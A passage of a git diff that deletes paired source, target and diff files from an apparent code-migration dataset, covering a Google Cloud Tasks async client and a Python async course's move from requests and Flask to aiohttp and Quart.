self.on_empty: - if not self.ready and not self.leased and not self.queue.qsize(): - if self.start_time: - self.duration = time.perf_counter() - self.start_time - - self.on_empty() - return - - await asyncio.sleep(0) - - async def lease_task(self, lease_seconds=60, num_tasks=1): - - await asyncio.sleep(0) - - tasks = [] - - while len(tasks) < num_tasks: - - try: - task = self.queue.get_nowait() - except asyncio.QueueEmpty: - break - - if not self.start_time: - self.start_time = time.perf_counter() - - if task['id'] in self.deleted: - del self.deleted[task['id']] - continue - - del self.ready[task['id']] - - self.leased[task['id']] = ( - call_later( - lease_seconds, - self._unlease, - task - ), - task - ) - - tasks.append(task) - - return tasks - - async def renew_task(self, id_, lease_seconds=60): - - if id_ not in self.leased: - return False - - asyncio_task, task = self.leased[id_] - asyncio_task.cancel() - - self.leased[id_] = ( - call_later( - lease_seconds, - self._unlease, - task - ), - task - ) - - return True diff --git a/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.target.py b/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.target.py deleted file mode 100644 index 733015d..0000000 --- a/v1/data/codefile/talkiq@gcloud-aio__d15540f__taskqueue$gcloud$aio$taskqueue$taskqueue.py.target.py +++ /dev/null @@ -1,149 +0,0 @@ -""" -An asynchronous queue for Google Appengine Task Queues -""" -import asyncio - -import aiohttp -from gcloud.aio.auth import Token - - -API_ROOT = 'https://cloudtasks.googleapis.com/v2beta2' -LOCATION = 'us-central1' -SCOPES = [ - 'https://www.googleapis.com/auth/cloud-tasks', -] - - -class TaskQueue: - def __init__(self, project, service_file, taskqueue, location=LOCATION, - session=None, token=None): - # pylint: disable=too-many-arguments - self.session = session or aiohttp.ClientSession() - - self.api_root = '{}/projects/{}/locations/{}/queues/{}'.format( - API_ROOT, project, location, taskqueue) - - self.token = token or Token(project, service_file, scopes=SCOPES, - session=self.session) - - async def headers(self): - return { - 'Authorization': 'Bearer {}'.format(await self.token.get()), - 'Content-Type': 'application/json', - } - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/acknowledge - async def ack(self, task, session=None): - url = '{}/{}:acknowledge'.format(API_ROOT, task['name']) - body = { - 'scheduleTime': task['scheduleTime'], - } - - s = session or self.session - resp = await s.post(url, json=body, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/cancelLease - async def cancel(self, task, session=None): - url = '{}/{}:cancelLease'.format(API_ROOT, task['name']) - body = { - 'scheduleTime': task['scheduleTime'], - 'responseView': 'BASIC', - } - - s = session or self.session - resp = await s.post(url, json=body, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/delete - async def delete(self, tname, session=None): - url = '{}/{}'.format(API_ROOT, tname) - - s = session or self.session - resp = await s.delete(url, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() - - async def drain(self): - resp = await 
self.lease(num_tasks=1000) - while resp: - await asyncio.wait([self.delete(t['name']) for t in resp['tasks']]) - resp = await self.lease(num_tasks=1000) - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/get - async def get(self, tname, full=False, session=None): - url = '{}/{}'.format(API_ROOT, tname) - params = { - 'responseView': 'FULL' if full else 'BASIC', - } - - s = session or self.session - resp = await s.get(url, params=params, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/create - async def insert(self, payload, tag=None, session=None): - url = '{}/tasks'.format(self.api_root) - body = { - 'task': { - 'pullMessage': { - 'payload': payload, - 'tag': tag, - }, - }, - 'responseView': 'FULL', - } - - s = session or self.session - resp = await s.post(url, json=body, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/lease - async def lease(self, num_tasks=1, lease_seconds=60, task_filter=None, - session=None): - url = '{}/tasks:lease'.format(self.api_root) - body = { - 'maxTasks': min(num_tasks, 1000), - 'leaseDuration': '{}s'.format(lease_seconds), - 'responseView': 'FULL', - } - if task_filter: - body['filter'] = task_filter - - s = session or self.session - resp = await s.post(url, json=body, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/list - async def list(self, full=False, page_size=1000, page_token='', - session=None): - url = '{}/tasks'.format(self.api_root) - params = { - 'responseView': 'FULL' if full else 'BASIC', - 'pageSize': page_size, - 'pageToken': page_token, - } - - s = session or self.session - resp = await s.get(url, params=params, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() - - # https://cloud.google.com/cloud-tasks/docs/reference/rest/v2beta2/projects.locations.queues.tasks/renewLease - async def renew(self, task, lease_seconds=60, session=None): - url = '{}/{}:renewLease'.format(API_ROOT, task['name']) - body = { - 'scheduleTime': task['scheduleTime'], - 'leaseDuration': '{}s'.format(lease_seconds), - 'responseView': 'FULL', - } - - s = session or self.session - resp = await s.post(url, json=body, headers=await self.headers()) - resp.raise_for_status() - return await resp.json() diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.diff b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.diff deleted file mode 100644 index 5efa8c8..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.diff +++ /dev/null @@ -1,38 +0,0 @@ -diff --git a/src/10-async-web/acityscape_api/services/location_service.py b/src/10-async-web/acityscape_api/services/location_service.py - index aa607bd32a90d7693e91bd4a1be39baec2d889ba..a5c04bbd9b5614a8fc0317050c01e4c241b1b41d 100644 - --- a/src/10-async-web/acityscape_api/services/location_service.py - +++ b/src/10-async-web/acityscape_api/services/location_service.py -@@ -1,7 +1,8 @@ - 
import random - import time - from typing import Tuple --import requests -+ -+import aiohttp - - use_cached_data = False - -@@ -10,7 +11,7 @@ measured_latency_in_sec = [ - 0.535646, 0.527148, 0.533472, 0.53351, 0.523462] - - --def get_lat_long(zip_code: str, country: str) -> Tuple[float, float]: -+async def get_lat_long(zip_code: str, country: str) -> Tuple[float, float]: - key = f'{zip_code}, {country}' - url = f'http://www.datasciencetoolkit.org/street2coordinates/{key.replace(" ", "+")}' - -@@ -18,10 +19,11 @@ def get_lat_long(zip_code: str, country: str) -> Tuple[float, float]: - time.sleep(random.choice(measured_latency_in_sec)) - return 45.50655, -122.733888 - else: -- resp = requests.get(url) -- resp.raise_for_status() -+ async with aiohttp.ClientSession() as session: -+ async with session.get(url) as resp: -+ resp.raise_for_status() - -- data = resp.json() -+ data = await resp.json() - - city_data = data.get(f'{zip_code}, {country}', dict()) - return city_data.get('latitude', 0.00), city_data.get('longitude', 0.00) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.source.py b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.source.py deleted file mode 100644 index 3797bb1..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.source.py +++ /dev/null @@ -1,27 +0,0 @@ -import random -import time -from typing import Tuple -import requests - -use_cached_data = False - -measured_latency_in_sec = [ - 0.28844, 0.334694, 0.33468, 0.343911, 0.339515, 0.344329, 0.341594, 0.352366, - 0.535646, 0.527148, 0.533472, 0.53351, 0.523462] - - -def get_lat_long(zip_code: str, country: str) -> Tuple[float, float]: - key = f'{zip_code}, {country}' - url = f'http://www.datasciencetoolkit.org/street2coordinates/{key.replace(" ", "+")}' - - if use_cached_data: - time.sleep(random.choice(measured_latency_in_sec)) - return 45.50655, -122.733888 - else: - resp = requests.get(url) - resp.raise_for_status() - - data = resp.json() - - city_data = data.get(f'{zip_code}, {country}', dict()) - return city_data.get('latitude', 0.00), city_data.get('longitude', 0.00) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.target.py b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.target.py deleted file mode 100644 index aaff903..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$location_service.py.target.py +++ /dev/null @@ -1,29 +0,0 @@ -import random -import time -from typing import Tuple - -import aiohttp - -use_cached_data = False - -measured_latency_in_sec = [ - 0.28844, 0.334694, 0.33468, 0.343911, 0.339515, 0.344329, 0.341594, 0.352366, - 0.535646, 0.527148, 0.533472, 0.53351, 0.523462] - - -async def get_lat_long(zip_code: str, country: str) -> Tuple[float, float]: - key = f'{zip_code}, {country}' - url = f'http://www.datasciencetoolkit.org/street2coordinates/{key.replace(" ", "+")}' - - if use_cached_data: - time.sleep(random.choice(measured_latency_in_sec)) - return 45.50655, -122.733888 - else: - async with aiohttp.ClientSession() as session: - async with session.get(url) as resp: - resp.raise_for_status() 
- - data = await resp.json() - - city_data = data.get(f'{zip_code}, {country}', dict()) - return city_data.get('latitude', 0.00), city_data.get('longitude', 0.00) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.diff b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.diff deleted file mode 100644 index 9bd6ac4..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.diff +++ /dev/null @@ -1,36 +0,0 @@ -diff --git a/src/10-async-web/acityscape_api/services/sun_service.py b/src/10-async-web/acityscape_api/services/sun_service.py - index aa607bd32a90d7693e91bd4a1be39baec2d889ba..a5c04bbd9b5614a8fc0317050c01e4c241b1b41d 100644 - --- a/src/10-async-web/acityscape_api/services/sun_service.py - +++ b/src/10-async-web/acityscape_api/services/sun_service.py -@@ -2,13 +2,13 @@ import datetime - import random - import time - --import requests -+import aiohttp - - measured_latency_in_sec = [0.399203, 0.7046, 0.422959, 0.741911, 0.404674] - use_cached_data = False - - --def for_today(latitude: float, longitude: float) -> dict: -+async def for_today(latitude: float, longitude: float) -> dict: - url = f'https://api.sunrise-sunset.org/json?lat={latitude}&lng={longitude}' - - if use_cached_data: # Set in config/dev.json or config/prod.json -@@ -18,10 +18,12 @@ def for_today(latitude: float, longitude: float) -> dict: - 'nautical_twilight_begin': '04:49:54 AM', 'nautical_twilight_end': '09:43:03 PM', - 'astronomical_twilight_begin': '04:03:13 AM', 'astronomical_twilight_end': '10:29:44 PM'} - else: -- resp = requests.get(url) -- resp.raise_for_status() -+ async with aiohttp.ClientSession() as session: -+ async with session.get(url) as resp: -+ -+ data = await resp.json() -+ sun_data = data.get('results', {}) - -- sun_data = resp.json().get('results', {}) - for k, v in list(sun_data.items()): - if 'AM' not in v and 'PM' not in v: - continue diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.source.py b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.source.py deleted file mode 100644 index acf875e..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.source.py +++ /dev/null @@ -1,39 +0,0 @@ -import datetime -import random -import time - -import requests - -measured_latency_in_sec = [0.399203, 0.7046, 0.422959, 0.741911, 0.404674] -use_cached_data = False - - -def for_today(latitude: float, longitude: float) -> dict: - url = f'https://api.sunrise-sunset.org/json?lat={latitude}&lng={longitude}' - - if use_cached_data: # Set in config/dev.json or config/prod.json - time.sleep(random.choice(measured_latency_in_sec)) - return {'sunrise': '06:04:09 AM', 'sunset': '08:28:48 PM', 'solar_noon': '01:16:28 PM', - 'day_length': '14:24:39', 'civil_twilight_begin': '05:31:10 AM', 'civil_twilight_end': '09:01:47 PM', - 'nautical_twilight_begin': '04:49:54 AM', 'nautical_twilight_end': '09:43:03 PM', - 'astronomical_twilight_begin': '04:03:13 AM', 'astronomical_twilight_end': '10:29:44 PM'} - else: - resp = requests.get(url) - resp.raise_for_status() - - sun_data = resp.json().get('results', {}) - for k, v in list(sun_data.items()): - 
if 'AM' not in v and 'PM' not in v: - continue - - sun_data[k] = datetime.datetime.strftime(__utc_to_local(v), '%I:%M:%S %p') - - return sun_data - - -def __utc_to_local(date_text: str) -> datetime.datetime: - # Not perfect, but works most of the time. - utc = datetime.datetime.strptime(date_text, '%I:%M:%S %p') - now_timestamp = time.time() - offset = datetime.datetime.fromtimestamp(now_timestamp) - datetime.datetime.utcfromtimestamp(now_timestamp) - return utc + offset diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.target.py b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.target.py deleted file mode 100644 index d1b4ab2..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$sun_service.py.target.py +++ /dev/null @@ -1,41 +0,0 @@ -import datetime -import random -import time - -import aiohttp - -measured_latency_in_sec = [0.399203, 0.7046, 0.422959, 0.741911, 0.404674] -use_cached_data = False - - -async def for_today(latitude: float, longitude: float) -> dict: - url = f'https://api.sunrise-sunset.org/json?lat={latitude}&lng={longitude}' - - if use_cached_data: # Set in config/dev.json or config/prod.json - time.sleep(random.choice(measured_latency_in_sec)) - return {'sunrise': '06:04:09 AM', 'sunset': '08:28:48 PM', 'solar_noon': '01:16:28 PM', - 'day_length': '14:24:39', 'civil_twilight_begin': '05:31:10 AM', 'civil_twilight_end': '09:01:47 PM', - 'nautical_twilight_begin': '04:49:54 AM', 'nautical_twilight_end': '09:43:03 PM', - 'astronomical_twilight_begin': '04:03:13 AM', 'astronomical_twilight_end': '10:29:44 PM'} - else: - async with aiohttp.ClientSession() as session: - async with session.get(url) as resp: - - data = await resp.json() - sun_data = data.get('results', {}) - - for k, v in list(sun_data.items()): - if 'AM' not in v and 'PM' not in v: - continue - - sun_data[k] = datetime.datetime.strftime(__utc_to_local(v), '%I:%M:%S %p') - - return sun_data - - -def __utc_to_local(date_text: str) -> datetime.datetime: - # Not perfect, but works most of the time. 
- utc = datetime.datetime.strptime(date_text, '%I:%M:%S %p') - now_timestamp = time.time() - offset = datetime.datetime.fromtimestamp(now_timestamp) - datetime.datetime.utcfromtimestamp(now_timestamp) - return utc + offset diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.diff b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.diff deleted file mode 100644 index 475487b..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.diff +++ /dev/null @@ -1,25 +0,0 @@ -diff --git a/src/10-async-web/acityscape_api/services/weather_service.py b/src/10-async-web/acityscape_api/services/weather_service.py - index aa607bd32a90d7693e91bd4a1be39baec2d889ba..a5c04bbd9b5614a8fc0317050c01e4c241b1b41d 100644 - --- a/src/10-async-web/acityscape_api/services/weather_service.py - +++ b/src/10-async-web/acityscape_api/services/weather_service.py -@@ -1,4 +1,4 @@ --import requests -+import aiohttp - - __api_key = '' - -@@ -8,9 +8,10 @@ def global_init(api_key: str): - __api_key = api_key - - --def get_current(zip_code: str, country_code: str) -> dict: -+async def get_current(zip_code: str, country_code: str) -> dict: - url = f'https://api.openweathermap.org/data/2.5/weather?zip={zip_code},{country_code}&appid={__api_key}' -- resp = requests.get(url) -- resp.raise_for_status() -+ async with aiohttp.ClientSession() as session: -+ async with session.get(url) as resp: -+ resp.raise_for_status() - -- return resp.json() -+ return await resp.json() diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.source.py b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.source.py deleted file mode 100644 index b4f8c39..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.source.py +++ /dev/null @@ -1,16 +0,0 @@ -import requests - -__api_key = '' - - -def global_init(api_key: str): - global __api_key - __api_key = api_key - - -def get_current(zip_code: str, country_code: str) -> dict: - url = f'https://api.openweathermap.org/data/2.5/weather?zip={zip_code},{country_code}&appid={__api_key}' - resp = requests.get(url) - resp.raise_for_status() - - return resp.json() diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.target.py b/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.target.py deleted file mode 100644 index 24528d2..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__a5c04bb__src$10-async-web$acityscape_api$services$weather_service.py.target.py +++ /dev/null @@ -1,17 +0,0 @@ -import aiohttp - -__api_key = '' - - -def global_init(api_key: str): - global __api_key - __api_key = api_key - - -async def get_current(zip_code: str, country_code: str) -> dict: - url = f'https://api.openweathermap.org/data/2.5/weather?zip={zip_code},{country_code}&appid={__api_key}' - async with aiohttp.ClientSession() as session: - async with session.get(url) as resp: - resp.raise_for_status() - - return await resp.json() diff --git 
a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.diff b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.diff deleted file mode 100644 index 0934d62..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.diff +++ /dev/null @@ -1,19 +0,0 @@ -diff --git a/src/10-async-web/acityscape_api/app.py b/src/10-async-web/acityscape_api/app.py - index aedbb01c138b66b190f011db11ca232b84e0c148..aa607bd32a90d7693e91bd4a1be39baec2d889ba 100644 - --- a/src/10-async-web/acityscape_api/app.py - +++ b/src/10-async-web/acityscape_api/app.py -@@ -1,4 +1,4 @@ --import flask -+import quart - from views import city_api - from views import home - from config import settings -@@ -6,7 +6,7 @@ import services.weather_service - import services.sun_service - import services.location_service - --app = flask.Flask(__name__) -+app = quart.Quart(__name__) - is_debug = True - - app.register_blueprint(home.blueprint) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.source.py b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.source.py deleted file mode 100644 index 40eb65a..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.source.py +++ /dev/null @@ -1,34 +0,0 @@ -import flask -from views import city_api -from views import home -from config import settings -import services.weather_service -import services.sun_service -import services.location_service - -app = flask.Flask(__name__) -is_debug = True - -app.register_blueprint(home.blueprint) -app.register_blueprint(city_api.blueprint) - - -def configure_app(): - mode = 'dev' if is_debug else 'prod' - data = settings.load(mode) - - services.weather_service.global_init(data.get('weather_key')) - services.sun_service.use_cached_data = data.get('use_cached_data') - services.location_service.use_cached_data = data.get('use_cached_data') - - print("Using cached data? {}".format(data.get('use_cached_data'))) - - -def run_web_app(): - app.run(debug=is_debug, port=5001) - - -configure_app() - -if __name__ == '__main__': - run_web_app() diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.target.py b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.target.py deleted file mode 100644 index f72bf3a..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$app.py.target.py +++ /dev/null @@ -1,34 +0,0 @@ -import quart -from views import city_api -from views import home -from config import settings -import services.weather_service -import services.sun_service -import services.location_service - -app = quart.Quart(__name__) -is_debug = True - -app.register_blueprint(home.blueprint) -app.register_blueprint(city_api.blueprint) - - -def configure_app(): - mode = 'dev' if is_debug else 'prod' - data = settings.load(mode) - - services.weather_service.global_init(data.get('weather_key')) - services.sun_service.use_cached_data = data.get('use_cached_data') - services.location_service.use_cached_data = data.get('use_cached_data') - - print("Using cached data? 
{}".format(data.get('use_cached_data'))) - - -def run_web_app(): - app.run(debug=is_debug, port=5001) - - -configure_app() - -if __name__ == '__main__': - run_web_app() diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.diff b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.diff deleted file mode 100644 index 5e1e35b..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.diff +++ /dev/null @@ -1,32 +0,0 @@ -diff --git a/src/10-async-web/acityscape_api/views/city_api.py b/src/10-async-web/acityscape_api/views/city_api.py - index aedbb01c138b66b190f011db11ca232b84e0c148..aa607bd32a90d7693e91bd4a1be39baec2d889ba 100644 - --- a/src/10-async-web/acityscape_api/views/city_api.py - +++ b/src/10-async-web/acityscape_api/views/city_api.py -@@ -1,15 +1,15 @@ --import flask -+import quart - from services import weather_service, sun_service, location_service - --blueprint = flask.blueprints.Blueprint(__name__, __name__) -+blueprint = quart.blueprints.Blueprint(__name__, __name__) - - - @blueprint.route('/api/weather//', methods=['GET']) - def weather(zip_code: str, country: str): - weather_data = weather_service.get_current(zip_code, country) - if not weather_data: -- flask.abort(404) -- return flask.jsonify(weather_data) -+ quart.abort(404) -+ return quart.jsonify(weather_data) - - - @blueprint.route('/api/sun//', methods=['GET']) -@@ -17,5 +17,5 @@ def sun(zip_code: str, country: str): - lat, long = location_service.get_lat_long(zip_code, country) - sun_data = sun_service.for_today(lat, long) - if not sun_data: -- flask.abort(404) -- return flask.jsonify(sun_data) -+ quart.abort(404) -+ return quart.jsonify(sun_data) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.source.py b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.source.py deleted file mode 100644 index 8b238c0..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.source.py +++ /dev/null @@ -1,21 +0,0 @@ -import flask -from services import weather_service, sun_service, location_service - -blueprint = flask.blueprints.Blueprint(__name__, __name__) - - -@blueprint.route('/api/weather//', methods=['GET']) -def weather(zip_code: str, country: str): - weather_data = weather_service.get_current(zip_code, country) - if not weather_data: - flask.abort(404) - return flask.jsonify(weather_data) - - -@blueprint.route('/api/sun//', methods=['GET']) -def sun(zip_code: str, country: str): - lat, long = location_service.get_lat_long(zip_code, country) - sun_data = sun_service.for_today(lat, long) - if not sun_data: - flask.abort(404) - return flask.jsonify(sun_data) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.target.py b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.target.py deleted file mode 100644 index a7682bb..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$city_api.py.target.py +++ /dev/null @@ -1,21 +0,0 @@ -import quart -from services import weather_service, 
sun_service, location_service - -blueprint = quart.blueprints.Blueprint(__name__, __name__) - - -@blueprint.route('/api/weather//', methods=['GET']) -def weather(zip_code: str, country: str): - weather_data = weather_service.get_current(zip_code, country) - if not weather_data: - quart.abort(404) - return quart.jsonify(weather_data) - - -@blueprint.route('/api/sun//', methods=['GET']) -def sun(zip_code: str, country: str): - lat, long = location_service.get_lat_long(zip_code, country) - sun_data = sun_service.for_today(lat, long) - if not sun_data: - quart.abort(404) - return quart.jsonify(sun_data) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.diff b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.diff deleted file mode 100644 index 89ce66a..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.diff +++ /dev/null @@ -1,19 +0,0 @@ -diff --git a/src/10-async-web/acityscape_api/views/home.py b/src/10-async-web/acityscape_api/views/home.py - index aedbb01c138b66b190f011db11ca232b84e0c148..aa607bd32a90d7693e91bd4a1be39baec2d889ba 100644 - --- a/src/10-async-web/acityscape_api/views/home.py - +++ b/src/10-async-web/acityscape_api/views/home.py -@@ -1,6 +1,6 @@ --import flask -+import quart - --blueprint = flask.blueprints.Blueprint(__name__, __name__) -+blueprint = quart.blueprints.Blueprint(__name__, __name__) - - - @blueprint.route('/') -@@ -12,4 +12,4 @@ def index(): - - @blueprint.errorhandler(404) - def not_found(_): -- return flask.Response("The page was not found.", status=404) -+ return quart.Response("The page was not found.", status=404) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.source.py b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.source.py deleted file mode 100644 index cb725eb..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.source.py +++ /dev/null @@ -1,15 +0,0 @@ -import flask - -blueprint = flask.blueprints.Blueprint(__name__, __name__) - - -@blueprint.route('/') -def index(): - return "Welcome to the city_scape API. " \ - "Use /api/sun/[zipcode]/[country code (e.g. us)] and" \ - "/api/weather/[zipcode]/[country code (e.g. us)] for API calls." - - -@blueprint.errorhandler(404) -def not_found(_): - return flask.Response("The page was not found.", status=404) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.target.py b/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.target.py deleted file mode 100644 index 432d5de..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__aa607bd__src$10-async-web$acityscape_api$views$home.py.target.py +++ /dev/null @@ -1,15 +0,0 @@ -import quart - -blueprint = quart.blueprints.Blueprint(__name__, __name__) - - -@blueprint.route('/') -def index(): - return "Welcome to the city_scape API. " \ - "Use /api/sun/[zipcode]/[country code (e.g. us)] and" \ - "/api/weather/[zipcode]/[country code (e.g. us)] for API calls." 
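- # Quart keeps Flask's blueprint/route API, so these handlers port over verbatim.
- # A minimal sketch (hypothetical, not part of the course file): the same style of
- # view written for Quart's async model, awaiting a coroutine before responding:
- #
- #   @blueprint.route('/status')
- #   async def status():
- #       payload = await fetch_status()  # fetch_status(): hypothetical async helper
- #       return quart.jsonify(payload)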
- - -@blueprint.errorhandler(404) -def not_found(_): - return quart.Response("The page was not found.", status=404) diff --git a/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.diff b/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.diff deleted file mode 100644 index 5010b6e..0000000 --- a/v1/data/codefile/talkpython@async-techniques-python-course__ab4e5fd__src$04-asyncio$web_scraping$async_scrape$program.py.diff +++ /dev/null @@ -1,63 +0,0 @@ -diff --git a/src/04-asyncio/web_scraping/async_scrape/program.py b/src/04-asyncio/web_scraping/async_scrape/program.py - index c130fe5f3b19c54ee39ce0ebe924947f339111fb..ab4e5fdd32982c97e9701d3e1fdb8c39882d4250 100644 - --- a/src/04-asyncio/web_scraping/async_scrape/program.py - +++ b/src/04-asyncio/web_scraping/async_scrape/program.py -@@ -1,16 +1,20 @@ --import requests -+import asyncio -+ -+import aiohttp - import bs4 - from colorama import Fore - - --def get_html(episode_number: int) -> str: -+async def get_html(episode_number: int) -> str: - print(Fore.YELLOW + f"Getting HTML for episode {episode_number}", flush=True) - - url = f'https://talkpython.fm/{episode_number}' -- resp = requests.get(url) -- resp.raise_for_status() - -- return resp.text -+ async with aiohttp.ClientSession() as session: -+ async with session.get(url) as resp: -+ resp.raise_for_status() -+ -+ return await resp.text() - - - def get_title(html: str, episode_number: int) -> str: -@@ -24,14 +28,28 @@ def get_title(html: str, episode_number: int) -> str: - - - def main(): -- get_title_range() -+ loop = asyncio.get_event_loop() -+ loop.run_until_complete(get_title_range()) - print("Done.") - - --def get_title_range(): -+async def get_title_range_old_version(): - # Please keep this range pretty small to not DDoS my site. ;) -- for n in range(150, 170): -- html = get_html(n) -+ for n in range(150, 160): -+ html = await get_html(n) -+ title = get_title(html, n) -+ print(Fore.WHITE + f"Title found: {title}", flush=True) -+ -+ -+async def get_title_range(): -+ # Please keep this range pretty small to not DDoS my site. 
